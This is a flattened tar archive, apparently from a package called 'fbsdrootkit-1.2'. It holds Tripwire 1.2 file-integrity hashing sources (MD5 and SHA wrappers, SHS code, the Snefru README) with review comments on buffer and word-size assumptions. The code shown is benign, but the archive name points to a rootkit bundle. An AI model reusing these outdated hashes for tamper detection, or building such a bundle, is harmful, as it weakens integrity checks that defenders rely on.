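#endif
#include "../../include/sigs.h"
#include "md5.h"

#define BUFSIZE 4096

/* One context shared by every call, so sig_md5_get is not reentrant. */
static MD5_CTX mdbucket;	/* MD5 data structure */

char *btob64();

/*
 * int
 * sig_md5_get(int fd_in, char *ps_signature, int siglen)
 *
 *	fd_in:		input file descriptor
 *	ps_signature:	array where the signature string will be stored
 *	siglen:		length of the signature array
 *
 * Reads the whole file behind fd_in from its beginning, computes its
 * MD5 digest and stores it in ps_signature, as 32 hex digits when
 * printhex is set and through btob64() otherwise.  Returns 0.  A
 * failure to open or read the stream prints a message and exits with
 * status 1.
 *
 * NOTE(review): siglen is accepted but never compared with the space
 * the signature needs (33 bytes for the hex form); the caller has to
 * supply a large enough array.
 */
int
sig_md5_get (fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    unsigned char	buffer[BUFSIZE];
    size_t		readin;
    int			i;
    MD5_CTX		*mdbuf;
    FILE		*fp;

    mdbuf = &mdbucket;
    ps_signature[0] = '\0';

    /* get stdio handle
     * 		we use dup() so we can close() it later
     */
    if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) {
	/* the message used to name sig_haval_get, which is not this
	 * function */
	perror("sig_md5_get: fdopen()");
	exit(1);
    }

    /* rewind the file descriptor */
    rewind(fp);

    MD5Init (mdbuf);
    while ((readin = fread(buffer, 1, BUFSIZE, fp)) > 0) {
	MD5Update(mdbuf, buffer, (unsigned int) readin);
    }
    /* fread() reports both end-of-file and failure as a short count and
     * never returns a negative value, so the stream's error flag is the
     * only way to tell them apart.  Without this test a read error
     * would yield a digest of a truncated file, and an integrity
     * checker would store or compare the wrong signature.
     */
    if (ferror(fp)) {
	perror("sig_md5_get: read()");
	exit(1);
    }
    MD5Final (mdbuf);

    if (printhex) {
	/* digest[i] is an unsigned char, so "%02x" is the matching
	 * conversion for every TW_TYPE32; each byte is written straight
	 * to its two-character slot and the last sprintf() terminates
	 * the string.
	 */
	for (i = 0; i < 16; i++) {
	    sprintf (ps_signature + 2 * i, "%02x",
		     (unsigned int) mdbuf->digest[i]);
	}
    }
    /* base 64 */
    else {
	btob64(mdbuf->digest, ps_signature, 128);
    }

    fclose(fp);
    return 0;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/sha/ 40700 764 764 0 5630552016 14721 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/sha/Makefile100600 764 764 444 5474057140 16446 0ustar dfdf# $Id: Makefile,v 1.2 1993/11/22 06:38:24 genek Exp $ # # Makefile for SHA wrapper # # Gene Kim # Purdue University # August 10, 1993 # all: sha.o shawrapper.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf *.o .pure sha.o: ../../include/byteorder.h shawrapper.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/sha/sha.c100600 764 764 26450 5614757145 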
16002 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: sha.c,v 1.5 1994/07/25 15:46:45 gkim Exp $"; #endif /* * sha.c * * signature function hook for SHA. * * Gene Kim * Purdue University * August 10, 1993 */ /* --------------------------------- SHS.H ------------------------------- */ /* NIST proposed Secure Hash Standard. Written 2 September 1992, Peter C. Gutmann. This implementation placed in the public domain. Comments to pgut1@cs.aukuni.ac.nz */ /* --------------------------------- SHS.C ------------------------------- */ /* NIST proposed Secure Hash Standard. Written 2 September 1992, Peter C. Gutmann. This implementation placed in the public domain. Comments to pgut1@cs.aukuni.ac.nz */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef TEST #include #endif #include "../../include/sigs.h" #include "../../include/byteorder.h" #include "sha.h" #if BYTEORDER == 0x1234 #define LITTLE_ENDIAN #endif /* The SHS f()-functions */ #define f1(x,y,z) ( ( x & y ) | ( ~x & z ) ) /* Rounds 0-19 */ #define f2(x,y,z) ( x ^ y ^ z ) /* Rounds 20-39 */ #define f3(x,y,z) ( ( x & y ) | ( x & z ) | ( y & z ) ) /* Rounds 40-59 */ #define f4(x,y,z) ( x ^ y ^ z ) /* Rounds 60-79 */ /* The SHS Mysterious Constants */ #define K1 0x5A827999L /* Rounds 0-19 */ #define K2 0x6ED9EBA1L /* Rounds 20-39 */ #define K3 0x8F1BBCDCL /* Rounds 40-59 */ #define K4 0xCA62C1D6L /* Rounds 60-79 */ /* SHS initial values */ #define h0init 0x67452301L #define h1init 0xEFCDAB89L #define h2init 0x98BADCFEL #define h3init 0x10325476L #define h4init 0xC3D2E1F0L /* 32-bit rotate - kludged with shifts */ #define S(n,X) ( ( X << n ) | ( X >> ( 32 - n ) ) ) /* The initial expanding function */ #ifdef NEW_SHA #define expand(count) temp = W[ count - 3 ] ^ W[ count - 8 ] ^ W[ count - 14 ] ^ W[ count - 16 ];W[ count ] = S(1, temp) #else #define expand(count) W[ count ] = W[ count - 3 ] ^ W[ count - 8 ] ^ W[ count - 14 ] ^ W[ count - 16 ] #endif /* The four SHS 
sub-rounds */ #define subRound1(count) \ { \ temp = S( 5, A ) + f1( B, C, D ) + E + W[ count ] + K1; \ E = D; \ D = C; \ C = S( 30, B ); \ B = A; \ A = temp; \ } #define subRound2(count) \ { \ temp = S( 5, A ) + f2( B, C, D ) + E + W[ count ] + K2; \ E = D; \ D = C; \ C = S( 30, B ); \ B = A; \ A = temp; \ } #define subRound3(count) \ { \ temp = S( 5, A ) + f3( B, C, D ) + E + W[ count ] + K3; \ E = D; \ D = C; \ C = S( 30, B ); \ B = A; \ A = temp; \ } #define subRound4(count) \ { \ temp = S( 5, A ) + f4( B, C, D ) + E + W[ count ] + K4; \ E = D; \ D = C; \ C = S( 30, B ); \ B = A; \ A = temp; \ } /* The two buffers of 5 32-bit words */ LONG h0, h1, h2, h3, h4; LONG A, B, C, D, E; /* Initialize the SHS values */ void shsInit(shsInfo) SHS_INFO *shsInfo; { /* Set the h-vars to their initial values */ shsInfo->digest[ 0 ] = h0init; shsInfo->digest[ 1 ] = h1init; shsInfo->digest[ 2 ] = h2init; shsInfo->digest[ 3 ] = h3init; shsInfo->digest[ 4 ] = h4init; /* Initialise bit count */ shsInfo->countLo = shsInfo->countHi = 0L; } /* Perform the SHS transformation. Note that this code, like MD5, seems to break some optimizing compilers - it may be necessary to split it into sections, eg based on the four subrounds */ void shsTransform(shsInfo) SHS_INFO *shsInfo; { LONG W[ 80 ], temp; int i; /* Step A. Copy the data buffer into the local work buffer */ for( i = 0; i < 16; i++ ) W[ i ] = shsInfo->data[ i ]; /* Step B. 
Expand the 16 words into 64 temporary data words */ expand( 16 ); expand( 17 ); expand( 18 ); expand( 19 ); expand( 20 ); expand( 21 ); expand( 22 ); expand( 23 ); expand( 24 ); expand( 25 ); expand( 26 ); expand( 27 ); expand( 28 ); expand( 29 ); expand( 30 ); expand( 31 ); expand( 32 ); expand( 33 ); expand( 34 ); expand( 35 ); expand( 36 ); expand( 37 ); expand( 38 ); expand( 39 ); expand( 40 ); expand( 41 ); expand( 42 ); expand( 43 ); expand( 44 ); expand( 45 ); expand( 46 ); expand( 47 ); expand( 48 ); expand( 49 ); expand( 50 ); expand( 51 ); expand( 52 ); expand( 53 ); expand( 54 ); expand( 55 ); expand( 56 ); expand( 57 ); expand( 58 ); expand( 59 ); expand( 60 ); expand( 61 ); expand( 62 ); expand( 63 ); expand( 64 ); expand( 65 ); expand( 66 ); expand( 67 ); expand( 68 ); expand( 69 ); expand( 70 ); expand( 71 ); expand( 72 ); expand( 73 ); expand( 74 ); expand( 75 ); expand( 76 ); expand( 77 ); expand( 78 ); expand( 79 ); /* Step C. Set up first buffer */ A = shsInfo->digest[ 0 ]; B = shsInfo->digest[ 1 ]; C = shsInfo->digest[ 2 ]; D = shsInfo->digest[ 3 ]; E = shsInfo->digest[ 4 ]; /* Step D. 
Serious mangling, divided into four sub-rounds */ subRound1( 0 ); subRound1( 1 ); subRound1( 2 ); subRound1( 3 ); subRound1( 4 ); subRound1( 5 ); subRound1( 6 ); subRound1( 7 ); subRound1( 8 ); subRound1( 9 ); subRound1( 10 ); subRound1( 11 ); subRound1( 12 ); subRound1( 13 ); subRound1( 14 ); subRound1( 15 ); subRound1( 16 ); subRound1( 17 ); subRound1( 18 ); subRound1( 19 ); subRound2( 20 ); subRound2( 21 ); subRound2( 22 ); subRound2( 23 ); subRound2( 24 ); subRound2( 25 ); subRound2( 26 ); subRound2( 27 ); subRound2( 28 ); subRound2( 29 ); subRound2( 30 ); subRound2( 31 ); subRound2( 32 ); subRound2( 33 ); subRound2( 34 ); subRound2( 35 ); subRound2( 36 ); subRound2( 37 ); subRound2( 38 ); subRound2( 39 ); subRound3( 40 ); subRound3( 41 ); subRound3( 42 ); subRound3( 43 ); subRound3( 44 ); subRound3( 45 ); subRound3( 46 ); subRound3( 47 ); subRound3( 48 ); subRound3( 49 ); subRound3( 50 ); subRound3( 51 ); subRound3( 52 ); subRound3( 53 ); subRound3( 54 ); subRound3( 55 ); subRound3( 56 ); subRound3( 57 ); subRound3( 58 ); subRound3( 59 ); subRound4( 60 ); subRound4( 61 ); subRound4( 62 ); subRound4( 63 ); subRound4( 64 ); subRound4( 65 ); subRound4( 66 ); subRound4( 67 ); subRound4( 68 ); subRound4( 69 ); subRound4( 70 ); subRound4( 71 ); subRound4( 72 ); subRound4( 73 ); subRound4( 74 ); subRound4( 75 ); subRound4( 76 ); subRound4( 77 ); subRound4( 78 ); subRound4( 79 ); /* Step E. Build message digest */ shsInfo->digest[ 0 ] += A; shsInfo->digest[ 1 ] += B; shsInfo->digest[ 2 ] += C; shsInfo->digest[ 3 ] += D; shsInfo->digest[ 4 ] += E; } #ifdef LITTLE_ENDIAN /* When run on a little-endian CPU we need to perform byte reversal on an array of longwords. 
It is possible to make the code endianness- independant by fiddling around with data at the byte level, but this makes for very slow code, so we rely on the user to sort out endianness at compile time */

/* Reverse the byte order of every LONG in buffer, in place.

   buffer    - array of words to convert
   byteCount - size of the array in bytes; it is divided by sizeof( LONG ),
               so a trailing partial word is left untouched

   NOTE(review): the shift/mask sequence below is a complete byte reversal
   only when LONG is exactly 32 bits wide.  sha.h falls back to
   "unsigned long" when TW_TYPE32 is not defined - confirm the width on the
   target platform before trusting the resulting digest. */
static void byteReverse(buffer, byteCount)
    LONG *buffer;
    int byteCount;
{
    LONG value;
    int count;

    /* Turn the byte count into a word count */
    byteCount /= sizeof( LONG );
    for( count = 0; count < byteCount; count++ )
        {
        /* Swap the two 16-bit halves, then the two bytes inside each half */
        value = ( buffer[ count ] << 16 ) | ( buffer[ count ] >> 16 );
        buffer[ count ] = ( ( value & 0xFF00FF00L ) >> 8 ) | ( ( value & 0x00FF00FFL ) << 8 );
        }
}
#endif /* LITTLE_ENDIAN */

/* Update SHS for a block of data.  This code assumes that the buffer size
   is a multiple of SHS_BLOCKSIZE bytes long, which makes the code a lot
   more efficient since it does away with the need to handle partial blocks
   between calls to shsUpdate()

   shsInfo - hash state being updated
   buffer  - input bytes
   count   - number of bytes in buffer

   A trailing partial block is only copied into shsInfo->data, it is not
   hashed here; shsFinal() pads and hashes it.  The next shsUpdate() call
   would overwrite those bytes, so only the last call may pass a count that
   is not a multiple of SHS_BLOCKSIZE.

   NOTE(review): count is a signed int and is not range-checked.  A negative
   value skips the loop and is then handed to the final memcpy() as its
   length - callers must guarantee count >= 0. */
void shsUpdate(shsInfo, buffer, count)
    SHS_INFO *shsInfo;
    BYTE *buffer;
    int count;
{
    /* Update bitcount.  The carry test relies on countLo wrapping around
       when the addition overflows.
       NOTE(review): presumably written for a 32-bit LONG; with a wider
       LONG the wrap would not happen at 2^32 - confirm. */
    if( ( shsInfo->countLo + ( ( LONG ) count << 3 ) ) < shsInfo->countLo )
        shsInfo->countHi++;    /* Carry from low to high bitCount */
    shsInfo->countLo += ( ( LONG ) count << 3 );
    /* Bits of the byte count that do not fit in countLo after the << 3 */
    shsInfo->countHi += ( ( LONG ) count >> 29 );

    /* Process data in SHS_BLOCKSIZE chunks */
    while( count >= SHS_BLOCKSIZE )
        {
        memcpy( (char *) shsInfo->data, (char *) buffer, SHS_BLOCKSIZE );
#ifdef LITTLE_ENDIAN
        byteReverse( shsInfo->data, SHS_BLOCKSIZE );
#endif /* LITTLE_ENDIAN */
        shsTransform( shsInfo );
        buffer += SHS_BLOCKSIZE;
        count -= SHS_BLOCKSIZE;
        }

    /* Handle any remaining bytes of data.  This should only happen once
       on the final lot of data.  At this point count is below
       SHS_BLOCKSIZE, so the copy stays inside shsInfo->data as long as
       count is not negative. */
    memcpy( (char *) shsInfo->data, (char *) buffer, count );
}

/* Finish the hash: pad the buffered partial block, append the bit count
   and run the final transform(s).

   shsInfo - hash state; the pending bytes left in shsInfo->data by the
             last shsUpdate() call are consumed here.  shsTransform() adds
             its result into shsInfo->digest.

   The number of pending bytes is recomputed from countLo, so the state must
   not have been modified since the last shsUpdate() call. */
void shsFinal(shsInfo)
    SHS_INFO *shsInfo;
{
    int count;
    LONG lowBitcount = shsInfo->countLo, highBitcount = shsInfo->countHi;

    /* Compute number of bytes mod 64 */
    count = ( int ) ( ( shsInfo->countLo >> 3 ) & 0x3F );

    /* Set the first char of padding to 0x80. 
This is safe since there is always at least one byte free */
    ( ( BYTE * ) shsInfo->data )[ count++ ] = 0x80;

    /* Pad out to 56 mod 64 */
    if( count > 56 )
        {
        /* Two lots of padding:  Pad the first block to 64 bytes */
        memset( ( char * ) shsInfo->data + count, 0, 64 - count );
#ifdef LITTLE_ENDIAN
        byteReverse( shsInfo->data, SHS_BLOCKSIZE );
#endif /* LITTLE_ENDIAN */
        shsTransform( shsInfo );

        /* Now fill the next block with 56 bytes */
        memset( (char *) shsInfo->data, 0, 56 );
        }
    else
        /* Pad block to 56 bytes */
        memset( ( char * ) shsInfo->data + count, 0, 56 - count );
#ifdef LITTLE_ENDIAN
    byteReverse( shsInfo->data, SHS_BLOCKSIZE );
#endif /* LITTLE_ENDIAN */

    /* Append length in bits and transform.  Words 14 and 15 are the last
       two words of the 16-word data buffer. */
    shsInfo->data[ 14 ] = highBitcount;
    shsInfo->data[ 15 ] = lowBitcount;

    shsTransform( shsInfo );
    /* NOTE(review): this reverses the first SHS_DIGESTSIZE bytes of the
       data buffer, not shsInfo->digest; the digest words are left as
       shsTransform() produced them - confirm that this is intended. */
#ifdef LITTLE_ENDIAN
    byteReverse( shsInfo->data, SHS_DIGESTSIZE );
#endif /* LITTLE_ENDIAN */
}

#ifdef TEST

/* ----------------------------- SHS Test code --------------------------- */

/* Size of buffer for SHS speed test data.
   NOTE(review): SHS_DIGESTSIZE * 100 is 2000 bytes, which is not a multiple
   of SHS_BLOCKSIZE, so every shsUpdate() call in the time trial leaves a
   partial block that the next call overwrites.  That is harmless for a
   timing run, but the digest it produces is not the digest of the data. */
#define TEST_BLOCK_SIZE ( SHS_DIGESTSIZE * 100 )

/* Number of bytes of test data to process */
#define TEST_BYTES 10000000L
#define TEST_BLOCKS ( TEST_BYTES / TEST_BLOCK_SIZE )

/* Self-test and speed test, built only when TEST is defined: hashes "abc",
   compares the result with a known digest, then times TEST_BLOCKS calls of
   shsUpdate() on a zero-filled buffer. */
void main()
{
    SHS_INFO shsInfo;
    time_t endTime, startTime;
    BYTE data[ TEST_BLOCK_SIZE ];
    long i;

    /* Test output data (this is the only test data given in the SHS
       document, but chances are if it works for this it'll work for
       anything).
       NOTE(review): these five words are the digest of "abc" under the
       original FIPS 180 algorithm.  sha.h defines NEW_SHA, whose comment
       describes the revised message expansion; if the part of sha.c that
       is not shown here honours it, this check would be expected to fail -
       confirm which variant the build actually computes. */
    shsInit( &shsInfo );
    shsUpdate( &shsInfo, ( BYTE * ) "abc", 3 );
    shsFinal( &shsInfo );
    if( shsInfo.digest[ 0 ] != 0x0164B8A9L || shsInfo.digest[ 1 ] != 0x14CD2A5EL || shsInfo.digest[ 2 ] != 0x74C4F7FFL || shsInfo.digest[ 3 ] != 0x082C4D97L || shsInfo.digest[ 4 ] != 0xF1EDF880L )
        {
        puts( "Error in SHS implementation" );
        exit( -1 );
        }

    /* Now perform time trial, generating MD for 10MB of data.  First,
       initialize the test data */
    memset( data, 0, TEST_BLOCK_SIZE );

    /* Get start time */
    printf( "SHS time trial. 
Processing %ld characters...\n", TEST_BYTES );
    time( &startTime );

    /* Calculate SHS message digest in TEST_BLOCK_SIZE byte blocks */
    shsInit( &shsInfo );
    for( i = TEST_BLOCKS; i > 0; i-- )
        shsUpdate( &shsInfo, data, TEST_BLOCK_SIZE );
    shsFinal( &shsInfo );

    /* Get finish time and time difference.
       NOTE(review): time() has one-second resolution; if the run finishes
       within the same second, endTime - startTime is 0 and the second
       printf divides by zero. */
    time( &endTime );
    printf( "Seconds to process test input: %ld\n", endTime - startTime );
    printf( "Characters processed per second: %ld\n", TEST_BYTES / ( endTime - startTime ) );
}

#endif
/* The next line is archive-member header residue marking the start of sha.h */
fbsdrootkit-1.2/tripwire-1.2/sigs/sha/sha.h100600 764 764 2606 5614757147 15766 0ustar dfdf
/* Useful defines/typedefs */

typedef unsigned char BYTE;
/* LONG is the word type of the hash state.
   NOTE(review): the byte-swap and bit-count code in sha.c appears to assume
   exactly 32 bits; the fallback below is wider on platforms where
   unsigned long is 64 bits. */
#ifdef TW_TYPE32
typedef unsigned TW_TYPE32 LONG;
#else
typedef unsigned long LONG;
#endif

/* The SHS block size and message digest sizes, in bytes */

#define SHS_BLOCKSIZE 64
#define SHS_DIGESTSIZE 20

/* The structure for storing SHS info */

typedef struct {
    LONG digest[ 5 ];         /* Message digest */
    LONG countLo, countHi;    /* 64-bit bit count */
    LONG data[ 16 ];          /* SHS data buffer */
} SHS_INFO;

/* Whether the machine is little-endian or not */

int sig_sha_get();

/* NOTE(review): neither the original SHS nor the revised algorithm selected
   by NEW_SHA is considered collision resistant today; a digest from this
   code should not be the only signature relied on for tamper detection. */

/* The next def turns on the change to the algorithm introduced by NIST at * the behest of the NSA. It supposedly corrects a weakness in the original * formulation. Bruce Schneier described it thus in a posting to the * Cypherpunks mailing list on June 21, 1994 (as told to us by Steve Bellovin): * * This is the fix to the Secure Hash Standard, NIST FIPS PUB 180: * * In Section 7 of FIPS 180 (page 9), the line which reads * * "b) For t=16 to 79 let Wt = Wt-3 XOR Wt-8 XOR Wt-14 XOR * Wt-16." * * is to be replaced by * * "b) For t=16 to 79 let Wt = S1(Wt-3 XOR Wt-8 XOR Wt-14 XOR * Wt-16)." * * where S1 is a left circular shift by one bit as defined in * Section 3 of FIPS 180 (page 6): * * S1(X) = (X<<1) OR (X>>31). 
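* */
#define NEW_SHA
fbsdrootkit-1.2/tripwire-1.2/sigs/sha/shawrapper.c100600 764 764 4054 5614757150 17353 0ustar dfdf
#ifndef lint
static char rcsid[] = "$Id: shawrapper.c,v 1.6 1994/07/25 15:46:48 gkim Exp $";
#endif

/*
 * shawrapper.c
 *
 *	signature function hook for SHA for Tripwire.
 *
 *	The original SHA code is contained in sha.c in its entirety.
 *
 * Gene Kim
 * Purdue University
 * August 10, 1993
 */

/* NOTE(review): the header names of the bare #include lines below are
 * missing from this copy of the file. */
#include "../../include/config.h"
#include
#include
#ifdef STDLIBH
#include
#include
#endif
#ifdef STRINGH
#include
#else
#include
#endif
#include "../../include/sigs.h"
#include "sha.h"

char *pltob64();

/*
 * int
 * sig_sha_get(int fd_in, char *ps_signature, int siglen)
 *
 *	Hash the whole file behind fd_in with SHS and store the signature
 *	as a NUL-terminated string in ps_signature.
 *
 *	fd_in:		input file descriptor; it is dup()ed, so the caller's
 *			descriptor stays open, but the stream is rewound
 *			before reading
 *	ps_signature:	pointer to array where signature will be stored
 *	siglen:		length of the signature array (for overflow checking)
 *
 *	Returns 0.  Any failure (fdopen, read error, signature array too
 *	small) prints a message and terminates the program with exit(1),
 *	so a caller never receives a truncated or partial signature.
 *
 *	The output is hex when the global printhex is set, otherwise it is
 *	produced by pltob64().
 */

#define BLOCKSIZE SHS_BLOCKSIZE

/* five digest words, eight hex digits each, plus the terminating NUL */
#define SHA_HEXSIGLEN (5 * 8 + 1)

int
sig_sha_get (fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    SHS_INFO shsInfo;
    unsigned char buffer[BLOCKSIZE];
    int readin = -1;
    int i;
    char s[128];
    FILE *fp;
    extern void shsInit(), shsUpdate(), shsFinal();

    /* never write to an array that cannot even hold the terminator */
    if (!ps_signature || siglen < 1) {
        fprintf(stderr, "sig_sha_get: signature buffer too small\n");
        exit(1);
    }
    ps_signature[0] = '\0';

    /* get stdio handle
     *		we use dup() so we can close() it later
     *		(a failed dup() makes fdopen() fail as well)
     */
    if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) {
        perror("sig_sha_get: fdopen()");
        exit(1);
    }

    /* rewind the file descriptor */
    rewind(fp);

    shsInit( &shsInfo );
    /* shsUpdate() only tolerates a partial block on its last call, so feed
     * full blocks here and the short tail once, after the loop */
    while ((readin = fread((char *)buffer, 1, BLOCKSIZE, fp)) == BLOCKSIZE) {
        shsUpdate(&shsInfo, buffer, readin);
    }
    /* fread() never returns a negative count; a short read is either end of
     * file or an error, and only ferror() can tell the two apart */
    if (ferror(fp)) {
        perror("sig_sha_get: read()");
        exit(1);
    }
    shsUpdate(&shsInfo, buffer, readin);
    shsFinal( &shsInfo );

    /* print out the signature */
    if (printhex) {
        if (siglen < SHA_HEXSIGLEN) {
            fprintf(stderr, "sig_sha_get: signature buffer too small\n");
            exit(1);
        }
        for (i = 0; i < 5; i++) {
            /* The former "#if (TW_TYPE32 == int)" test was always true in
             * the preprocessor (both type names evaluate to 0), so "%08x"
             * was used even when LONG is unsigned long.  Mask to 32 bits
             * and print as unsigned long: always exactly eight digits. */
            sprintf(s, "%08lx",
                    (unsigned long) (shsInfo.digest[i] & 0xffffffffL));
            strcat(ps_signature, s);
        }
    }
    /* base 64 */
    else {
        /* NOTE(review): pltob64() is not told siglen and its output length
         * is not visible here - confirm the array is large enough. */
        pltob64(shsInfo.digest, ps_signature, 5);
    }

    fclose(fp);

    return 0;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/snefru/ 40700 764 764 0 5630552017 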
15451 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/snefru/Makefile100600 764 764 372 5474057141 17176 0ustar dfdf# $Id: Makefile,v 1.3 1993/11/22 06:38:25 genek Exp $ # # Makefile for snefru wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: snefru.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf *.o .pure snefru.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/snefru/README.snefru100600 764 764 20464 5434607554 17770 0ustar dfdf# $Id: README.snefru,v 1.2 1993/08/19 05:28:12 genek Exp $ The Snefru one-way hash function package is copyrighted by Xerox Corporation. The following disclaimer can be found in the Snefru C code: (Comments on changes made to accommodate its use within Tripwire follow the disclaimer.) ================== /* This is an implementation of Snefru. Snefru is a one-way hash function that provides authentication. It does not provide secrecy. Snefru is named after a Pharaoh of ancient Egypt. Copyright (c) Xerox Corporation 1989. All rights reserved. License to copy and use this software is granted provided that it is identified as the "Xerox Secure Hash Function" in all material mentioning or referencing this software or this hash function. License is also granted to make and use derivative works provided that such works are identified as "derived from the Xerox Secure Hash Function" in all material mentioning or referencing the derived work. Xerox Corporation makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this software. Updated information about Snefru is available from arisia.xerox.com in directory /pub/hash by anonymous FTP. The README file provides a quick introduction. This is version 2.5a, November 29, 1990. 
Version 2.5a provides a reasonably understandable and efficient implementation of Snefru. Further, this version provides 8 passes. While 4 pass Snefru has not been broken, the use of 4 pass Snefru for production use is not recommended at this time. Further study of the security of Snefru is required before production use is advisable. This program reads from the standard input until EOF is reached (the first "read" that returns 0 bytes). The data on the standard input is "hashed" with a cryptographically secure one-way hash function (also known as a "message digest", "fingerprint", "Manipulation Detection Code" or "MDC"). The hash is then printed on the standard output. The input can be of any size. The output is 128 bits printed as 32 characters in hex. The output size can be changed to 256 bits be setting the parameter OUTPUT_BLOCK_SIZE to 8. (The 8 indicates the number of 32-bit words in the output). The primary use of one-way hash functions is to determine if there have been any unauthorized, malicious, or accidental changes made to a file. For example, if an executable program file produces the hash "209884c4 2e89d967 5456ac0e 61269550", then any change to that program file will cause the hash to be changed. Thus, the tampering can be detected by comparing the current output value with the previously computed (and presumably correct) output value. Hash512 is the centrol routine in this program. It is used in this program in a linear fashion -- i.e., a sequential file is hashed down by repeated applications of Hash512. Changing a single bit in the file would then require completely re-computing the hash from the point of change onward. Hash512 can be used in a tree-structured fashion to authenticate a large table of data. 
This would imply that changing a single bit would not force a complete re-computation of the hash value, but would instead require only log n re-computations of Hash512 to "patch up" the changes along the path from the root to the changed leaf entry. A tree-structured application also has the advantage that any single entry in the table can subsequently be authenticated by someone who knows only the "authentication path" from the root of the tree to the leaf entry. These concepts are discussed more thoroughly in "Secrecy, Authentication, and Public Key Systems" by Ralph C. Merkle, UMI Research Press, 1982 (see particularly Chapter 2, "One Way Hash Functions"). The use of a tree-structured pattern of applications of a one-way hash function is covered by U.S. Patent #4,309,569, "Method of Providing Digital Signatures" (contact Stanford University, Office of Technology Licensing). At the present time (November 29, 1990) the author knows of no method for "breaking" this one-way function, (i.e., finding two input files that produce the same output value). We recommend against the use of output sizes smaller than 128 bits, and against the use of an input that is less than 2 (two) words larger than the size of the output. When the input size equals the output size, Snefru suffers a serious degradation in security (an observation due to Coppersmith). Further study and validation of the security of Snefru is required prior to production use. If anyone using this program finds two different inputs that produce the same output, please contact Ralph C. Merkle via E-mail (merkle@xerox.com) or via normal mail at: Xerox PARC 3333 Coyote Hill Road Palo Alto, CA 94304 (415) 494-4000 See the paper "A Fast Software One Way Hash Function" by Ralph C. Merkle, to appear in The Journal of Cryptology, for a more detailed explanation. The following test cases were taken directly from a terminal, and can be used to verify the correct functioning of an implementation of Snefru. 
The first input is simply a carriage return followed by control-d. The second input is "1" followed by carriage return followed by control-d, the third input is "12" followed by carriage return followed by control-d, etc. (In some cases, two control-d's will be required). Note that the test cases given are from 8-pass Snefru (e.g., SECURITY_LEVEL=8) % ./snefru d9fcb317 1c097fbb a8c8f12a a0906bad % ./snefru 1 44ec420c e99c1f62 feb66c53 c24ae453 % ./snefru 12 7182051a a852ef6f ba4b6c9c 9b79b317 % ./snefru 123 bc3a50af 82bf56d6 a64732bc 7b050a93 % ./snefru 1234 c5b8a049 85a8eadf b4331a89 88752b77 % ./snefru 12345 d559a2b6 2f6f4411 1324f852 08723707 % ./snefru 123456 6cfb5e8f 1da02bd1 67b01e48 16686c30 % ./snefru 1234567 29aa4832 5f275a8a 7a01ba15 43c54ba5 % ./snefru 12345678 be862a6b 68b7df88 7ebe0031 9cbc4a47 % ./snefru 123456789 6103721c cd8ad565 d68e90b0 f8906163 % The following outputs were obtained after the program was compiled with OUTPUT_BLOCK_SIZE set to 8. This can be done by using the -D option on cc, as: cc -o snefru256 -DOUTPUT_BLOCK_SIZE=8 snefru.c Note that the test cases given are from 8-pass Snefru (e.g., SECURITY_LEVEL=8) % ./snefru256 2e02687f 0d45d5b9 b50cb68c 3f33e684 3d618a1a ca2d0689 3d3eb4e3 026b5732 % ./snefru256 1 bfea4a05 a2a2ef15 c736d114 598a20b9 d9bd4d66 b661e6b0 5ecf6a77 37bdc58c % ./snefru256 12 ac677d69 761ade3f 189c7aef 106d5fe7 392d324e 19cc76d5 db4a2c05 f2cc2cc5 % ./snefru256 123 061c76aa 1db4a22c 0e42945e 26c48499 b5400162 e08c640b e05d3c00 7c44793d % ./snefru256 1234 1e87fe1d 9c927e9e 24be85e3 cc733598 73541640 a6261793 ce5a9749 53113f5e % ./snefru256 12345 1b59927d 85a9349a 87796620 fe2ff401 a06a7ba4 8794498e bab978ef c3a68912 % ./snefru256 123456 28e9d9bc 35032b68 faeda881 01ecb252 4317e9da 111b0e3e 70941072 12d9cf72 % ./snefru256 1234567 f7fff4ee 74fd1b8d 6b3267f8 4e47e007 f029d13b 8af7e37e 34d13b46 9b8f248f % ./snefru256 12345678 ee7d64b0 102b2205 e9892661 3b200185 559d08be 6ad787da 717c9687 44e11af3 % ./snefru256 123456789 
4ca72639 e40e9ab9 c0c3f523 c4449b39 11632d37 4c124d77 02192ec2 e4e0b7a3 % Note that "word32" MUST be 32 bits Implementor: Ralph C. Merkle */ ================== The Snefru one-way hash function package is copyrighted by Xerox Corporation. The disclaimer from the C code has been retained, and is shown above. All big-endian/little-endian specific code in snefru.c has been replaced by code that can resolve this automatically at compile-time. Tripwire specific code is also in snefru.c to minimize the amount of overhead in collecting signatures from within Tripwire. (We certainly don't want to fork() for every file we need to scan!) Because of this, snefru.c is no longer identical to the virgin Snefru distribution. I have sent my changes to the author, but I am not aware of any buybacks at this time. The original Snefru code can be obtained via anonymous FTP from arisia.xerox.com. The original README file has been retained in the Tripwire distribution. Gene Kim September 7, 1992 fbsdrootkit-1.2/tripwire-1.2/sigs/snefru/snefru.c100600 764 764 236401 5614757154 17277 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: snefru.c,v 1.9 1994/07/25 15:46:52 gkim Exp $"; #endif /* * snefru.c * * signature function hook for Snefru (the Xerox Secure Hash Function) * for Tripwire. * * Originally released by Xerox into the public domain. Slightly * changed to facilitate hook into other packages and increase * portability. * * The original distribution banner follows. * * Gene Kim * Purdue University * September 27, 1992 */ char *pltob64(); /* This is an implementation of Snefru. Snefru is a one-way hash function that provides authentication. It does not provide secrecy. Snefru is named after a Pharaoh of ancient Egypt. Copyright (c) Xerox Corporation 1989. All rights reserved. License to copy and use this software is granted provided that it is identified as the "Xerox Secure Hash Function" in all material mentioning or referencing this software or this hash function. 
